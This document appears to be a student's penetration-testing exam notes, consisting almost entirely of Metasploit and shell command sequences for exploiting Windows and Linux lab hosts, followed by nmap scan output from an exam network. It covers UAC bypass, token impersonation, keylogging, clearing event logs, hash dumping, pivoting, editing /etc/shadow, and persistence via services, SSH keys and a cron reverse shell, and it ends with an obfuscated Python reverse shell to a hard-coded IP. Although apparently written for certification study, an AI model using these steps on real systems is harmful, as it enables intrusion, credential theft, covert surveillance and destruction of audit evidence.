> setg RHOSTS <IP>
> db_nmap -sV <IP>
> search rejetto
> use exploit/windows/http/rejetto_hfs_exec
> run
> getsystem // elevate privileges
> getuid
> hashdump
> show_mount
> ps // list process
> migrate <pid>

> search win_privs
> use post/windows/gather/win_privs
> set SESSION <id>
> run
> search enum_logged
> use post/windows/gather/enum_logged_on_users
> set SESSION <id>
> run
> search checkvm
> use post/windows/gather/checkvm
> set SESSION <id>
> run
> search enum_applications
> use post/windows/gather/enum_applications
> set SESSION <id>
> run
> loot // Store results in DB
> use post/windows/gather/windows_av_excluded
> set SESSION 1
> run
> search enum_computer
> use post/windows/gather/enum_computers
> search enum_patches
> use post/windows/gather/enum_patches
> use post/windows/gather/enum_shares
> use post/windows/manage/enable_rdp
> set SESSION <id>
> run

UAC Bypass

> use exploit/windows/http/rejetto_hfs_exec
> set payload windows/x64/meterpreter/reverse_tcp
> set LHOST eth1
> exploit
> sysinfo
> getuid
> getsystem
> getprivs
> shell
> net users
> net localgroup administrators
> background
> search bypassuac
> use exploit/windows/local/bypassuac_injection
> set payload windows/x64/meterpreter/reverse_tcp
> set SESSION 1
> set LPORT 1234
> run
> set TARGET Windows\ x64
> run
> getsystem
> hashdump

Token Impersonation With Incognito

> use exploit/windows/http/rejetto_hfs_exec
> set payload windows/x64/meterpreter/reverse_tcp
> set LHOST eth1
> exploit
> sysinfo
> getprivs
> load incognito
> list_tokens -u
> impersonate_token "ATTACKDEFENSE\Administrator"
> getuid
> migrate <>
> getuid

Windows Persistence

> use exploit/windows/http/rejetto_hfs_exec
> set payload windows/x64/meterpreter/reverse_tcp
> set LHOST eth1
> exploit
> background
> search platform:windows name:persistence
> use exploit/windows/local/persistence_service
> set payload windows/x64/meterpreter/reverse_tcp
> set SESSION 1
> exploit
> set payload windows/meterpreter/reverse_tcp
> exploit
> sysinfo
> sessions -K


> use multi/handler
> set LHOST eth1
> run

Enabling RDP

> use exploit/windows/http/badblue_passthru
> set RHOSTS
> set target Badblue\ EE\ 2.7\ Universal
> exploit
> background
> search enable_rdp
> use post/windows/manage/enable_rdp
> set SESSION 1
> exploit
> db_nmap -sV -p 3389 <IP>
> shell 
> net user administrator hacker_123321 // Change Password
> xfreerdp /u:administrator /p:hacker_123321 /v:<IP>

Windows Keylogging

> use exploit/windows/http/badblue_passthru
> exploit
> pgrep explorer
> migrate <ID>
> keyscan_start
> keyscan_dump

Clearing Windows Event Logs

> use exploit/windows/http/badblue_passthru
> exploit
> clearev // Deletes Event Logs

Windows Pivoting

> use exploit/windows/http/rejetto_hfs_exec
> exploit
> sysinfo
> ipconfig // Copy the IP which is from same subnet : Victim 2
> run autoroute -s <IP>/<range> (Range-20)
> background
> use auxiliary/scanner/portscan/tcp
> set RHOSTS <Victim2>
> set PORTS 1-100
> exploit
> sessions 1
> portfwd add -l 1234 -p 80 -r <Victim-2-Ip>
> background
> db_nmap -sS -sV -p 1234 localhost
> use exploit/windows/http/badblue_passthru
> set payload windows/meterpreter/bind_tcp
> set RHOSTS <V-2-Ip>
> set LPORT 4433
> exploit
> sysinfo

Linux Post Exploitation

Post-Exploitation Modules

> search samba
> use exploit/linux/samba/is_known_pipename
> set RHOSTS <IP>
> exploit
> pwd
> background
> sessions -u 1 
> sessions 2
> sysinfo
> getuid
> shell
> /bin/bash -i
> whoami
> uname -r 
> uname -a 
> ifconfig
> ip a s 
> netstat -antp
> ps aux
> env
> terminate
> sessions -u 1 
> search enum_configs
> set SESSION <Meterpreter>
> run
> loot
> serach env platform:linux 
> use post/multi/gather/env
> set SESSION <id>
> run
> search enum_network
> use post/linux/gather/enum_network
> set SESSION <id>
> run
> search enum_protections
> set SESSION <id>
> run
> notes
> search enum_system
> set SESSION <id>
> run
> serach checkcontainer
> set SESSION <id>
> run
> search enum_users_history
> set SESSION <id>
> run

Linux Privilege Escalation

> setg RHOSTS <IP>
> search ssh_login
> use auxiliary/scanner/ssh/ssh_login
> set USERNAME jackie
> set PASSWORD password
> exploit
> sessions 1 
> pwd
> whoami
> background
> sessions -u 1 
> sessions 2
> sysinfo
> getuid
> bash
> ps aux 
> cat /bin/check-down
> chkrootkit --help
> chkrootkit -V
> background
> saerch chkrootkit
> show options
> set CHKROOKIT /bin/chkrootkit
> set SESSION <mp-id>
> set LHOST eth1
> exploit
> /bin/bash -i

Dumping Hashes with Hashdump

> setg RHOSTS <IP>
> use exploit/linux/samba/is_known_pipename
> exploit
> sessions -u 1
> sessions 2
> sysinfo
> getuid
> background
> search hashdump
> use post/linux/gather/hashdump
> show options
> set SESSION <id>
> run
> loot
> sessions 3
> /bin/bash -i

Establishing Persistence on Linux

> use auxiliary/scanner/ssh/ssh_login
> set USERNAME jackie
> set PASSWORD password
> exploit
> sessions
> sessions -u 1
> sessions 2
> search chkrootkit
> set SESSION <id>
> set CHKROOTKIT /bin/chkrootkit
> set LHOSTS eth1
> set LPORT <>
> exploit
> sessions -u 3
> sessions 4
> getuid
> shell
> /bin/bash -i
> useradd -m ftp -s /bin/bash
> passwd ftp // enter: password123
> cat /etc/passwd
> groups root
> usermod -aG root ftp
> groups ftp
> usermod -u 15 ftp
> cat /etc/passwd
> search platform:linux persistence
> use exploit/linux/local/cron_persistence
> set SESSION 4
> set LPORT 4422
> set LHOST eth1
> exploit // fail
> use exploit/linux/local/service_persistence
> set SESSION 4
> set payload cmd/unix/reverse_python
> set LPORT 4422
> exploit // fail
> set target 4
> exploit // fail
> use exploit/linux/local/sshkey_persistence
> set CREATESSHFOLDER true
> set SESSION 4
> exploit 
> loot
> cat private_key.txt // use from loot
> nano ssh_key // paste the key
> chmod 0400 ssh_key
> ssh -i ssh_key root@<target-ip>
> 

Exploitation

Banner Grabbing

> nmap -sV -O <IP>
> ls -la /usr/share/nmap/scripts | grep banner
> nmap -sV --script=banner <IP>
> nc <IP> <Port>

Nmap Vulnerability Scanning

> nmap -sV -O <IP>
> ls -la /usr/share/nmap/scripts/ | grep http
> nmap -sV --script=http-enum <IP>

Post Exploitation

Methodology

• Local Enumeration
• Transferring Files
• Upgrading Shells
• Privilege Escalation
• Persistence
• Dumping & Cracking Hashes
• Pivoting
• Clearing Tracks

Windows

Enum Users & Groups

> use post/windows/gather/enum_logged_on_users
> set SESSION 1
> run
> shell
> net user administrator
> whoami /priv
> route print
> netstat -ano
> netsh firewall show state
> tasklist /SVC // Enumerate the list of running processes

> show_mount
> use post/windows/gather/win_privs
> set SESSION 1
> run
> use post/windows/gather/enum_applications
> use post/windows/gather/enum_computers
> use post/windows/gather/enum_patches

Linux

Enum

> useradd bob -s /bin/bash
> githum.com/rebootuser/LinEnum

Windows Priv Escalation

> PrivescCheck
> search web_delivery
> use exploit/multi/script/web_delivery
> set TARGET PSH\ (Binary)
> set payload windows/shell/reverse_tcp
> set PSH-EncodedCommand false
> set LHOST eth1
> exploit
> copy & paste in windows cmd
> whoami
> background
> use shell_to_meterpreter
> set LHOST eth1
> set WIN_TRANSFER VBS
> exploit

Linux Priv Escalation

// Exploiting Permissions
> whoami
> cat /etc/passwd
> find / -not -type l -perm -o+w
> cat /etc/shadow
> openssl passwd -1 -salt abc password
> nano /etc/shadow  // Remove * & paste the hash
> su 

// Exploiting SUDO Privs
> cat /etc/passwd
> sudo -l 
> sudo man cat 
> !/bin/bash

Linux Persistence

// Via SSH Keys
> ssh student@<IP> // password:password
> ls -la
> cat wait
> cd .ssh
> cat id_rsa
> cat authorized_key
> scp student@<IP>:~/.ssh/id_rsa . // copy id_rsa locally
> chmod 400 id_rsa
> ssh student@<IP> // password:password
> rm wait
> ssh -i id_rsa student@<IP>

// Via Cron Jobs
> ssh student@<IP> // password:password
> cat /etc/cron*
> echo "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/<kali-ip>/<port> 0>&1'" > cron
> cat cron 
> crontab -i cron
> crontab -l
> rm wait
> nc -nvlp 1234
> 

Exam Notes

Discovery

192.168.100.1

192.168.100.50 192.168.100.51 192.168.100.52 192.168.100.55 192.168.100.63 192.168.100.67

root@kali:~# cat nmap_results.txt 
# Nmap 7.92 scan initiated Sun Oct 27 00:13:58 2024 as: nmap -iL hosts.txt -p- -sV -o nmap_results.txt
Nmap scan report for ip-192-168-100-1.ec2.internal (192.168.100.1)
Host is up (0.00012s latency).
All 65535 scanned ports on ip-192-168-100-1.ec2.internal (192.168.100.1) are in ignored states.
Not shown: 65535 filtered tcp ports (no-response)
MAC Address: 0E:09:28:41:24:0D (Unknown)

Nmap scan report for ip-192-168-100-50.ec2.internal (192.168.100.50)
Host is up (0.00048s latency).
Not shown: 65521 closed tcp ports (reset)
PORT      STATE SERVICE            VERSION
80/tcp    open  http               Apache httpd 2.4.51 ((Win64) PHP/7.4.26)
135/tcp   open  msrpc              Microsoft Windows RPC
139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds       Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3307/tcp  open  opsession-prxy?
3389/tcp  open  ssl/ms-wbt-server?
5985/tcp  open  http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
47001/tcp open  http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49152/tcp open  msrpc              Microsoft Windows RPC
49153/tcp open  msrpc              Microsoft Windows RPC
49154/tcp open  msrpc              Microsoft Windows RPC
49155/tcp open  msrpc              Microsoft Windows RPC
49156/tcp open  msrpc              Microsoft Windows RPC
49170/tcp open  msrpc              Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3307-TCP:V=7.92%I=7%D=10/27%Time=671D38A8%P=x86_64-pc-linux-gnu%r(N
SF:ULL,5C,"X\0\0\x01\xffj\x04Host\x20'ip-192-168-100-5\.ec2\.internal'\x20
SF:is\x20not\x20allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20serve
SF:r");
MAC Address: 0E:8E:0B:A8:D8:B7 (Unknown)
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Nmap scan report for ip-192-168-100-51.ec2.internal (192.168.100.51)
Host is up (0.00054s latency).
Not shown: 65521 closed tcp ports (reset)
PORT      STATE SERVICE            VERSION
21/tcp    open  ftp                Microsoft ftpd
80/tcp    open  http               Microsoft IIS httpd 8.5
135/tcp   open  msrpc              Microsoft Windows RPC
139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds       Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp  open  ssl/ms-wbt-server?
5985/tcp  open  http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
47001/tcp open  http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49152/tcp open  msrpc              Microsoft Windows RPC
49153/tcp open  msrpc              Microsoft Windows RPC
49154/tcp open  msrpc              Microsoft Windows RPC
49155/tcp open  msrpc              Microsoft Windows RPC
49156/tcp open  msrpc              Microsoft Windows RPC
49170/tcp open  msrpc              Microsoft Windows RPC
MAC Address: 0E:9D:2F:E4:04:19 (Unknown)
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Nmap scan report for ip-192-168-100-52.ec2.internal (192.168.100.52)
Host is up (0.00085s latency).
Not shown: 65528 closed tcp ports (reset)
PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           vsftpd 3.0.3
22/tcp   open  ssh           OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http          Apache httpd 2.4.41
139/tcp  open  netbios-ssn   Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn   Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
3306/tcp open  mysql         MySQL 5.5.5-10.3.34-MariaDB-0ubuntu0.20.04.1
3389/tcp open  ms-wbt-server xrdp
MAC Address: 0E:80:12:6B:30:4D (Unknown)
Service Info: Host: IP-192-168-100-52; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Nmap scan report for ip-192-168-100-55.ec2.internal (192.168.100.55)
Host is up (0.00091s latency).
Not shown: 65520 closed tcp ports (reset)
PORT      STATE SERVICE       VERSION
80/tcp    open  http          Microsoft IIS httpd 10.0
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds  Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  msrpc         Microsoft Windows RPC
49671/tcp open  msrpc         Microsoft Windows RPC
49672/tcp open  msrpc         Microsoft Windows RPC
MAC Address: 0E:04:94:F6:FC:91 (Unknown)
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Nmap scan report for ip-192-168-100-63.ec2.internal (192.168.100.63)
Host is up (0.00070s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
3389/tcp open  ms-wbt-server Microsoft Terminal Services
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
MAC Address: 0E:BF:EF:1B:8C:55 (Unknown)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Nmap scan report for ip-192-168-100-67.ec2.internal (192.168.100.67)
Host is up (0.00045s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
MAC Address: 0E:64:29:A9:B2:2D (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Oct 27 00:32:24 2024 -- 7 IP addresses (7 hosts up) scanned in 1105.30 seconds

msf6 auxiliary(scanner/portscan/tcp) > run

[+] 192.168.0.50:         - 192.168.0.50:80 - TCP OPEN
[+] 192.168.0.50:         - 192.168.0.50:135 - TCP OPEN
[+] 192.168.0.50:         - 192.168.0.50:139 - TCP OPEN
[+] 192.168.0.50:         - 192.168.0.50:445 - TCP OPEN
[+] 192.168.0.50:         - 192.168.0.50:3389 - TCP OPEN
[+] 192.168.0.50:         - 192.168.0.50:5985 - TCP OPEN
[+] 192.168.0.50:         - 192.168.0.50:47001 - TCP OPEN
[+] 192.168.0.50:         - 192.168.0.50:49669 - TCP OPEN
[+] 192.168.0.50:         - 192.168.0.50:49664 - TCP OPEN
[+] 192.168.0.50:         - 192.168.0.50:49665 - TCP OPEN
[+] 192.168.0.50:         - 192.168.0.50:49666 - TCP OPEN
[+] 192.168.0.50:         - 192.168.0.50:49671 - TCP OPEN
[+] 192.168.0.50:         - 192.168.0.50:49667 - TCP OPEN
[+] 192.168.0.50:         - 192.168.0.50:49670 - TCP OPEN
[+] 192.168.0.50:         - 192.168.0.50:49672 - TCP OPEN
[*] 192.168.0.50:         - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed


[*] Performing ping sweep for IP range 192.168.0.0/24
[+]     192.168.0.1 host found
[+]     192.168.0.57 host found
[+]     192.168.0.51 host found
[+]     192.168.0.50 host found
[*] Post module execution completed

python -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('10.10.1.24', 4444)), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g['p'] in [(subprocess.Popen(['\\windows\\system32\\cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 'p2s')]][0] for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after())[1] if (len(__l['data']) > 0) else __after())(lambda: __this()) for __l['data'] in [(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 's2p')]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, __g))]][0] for __g['threading'] in [(__import__('threading', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__('contextlib'))"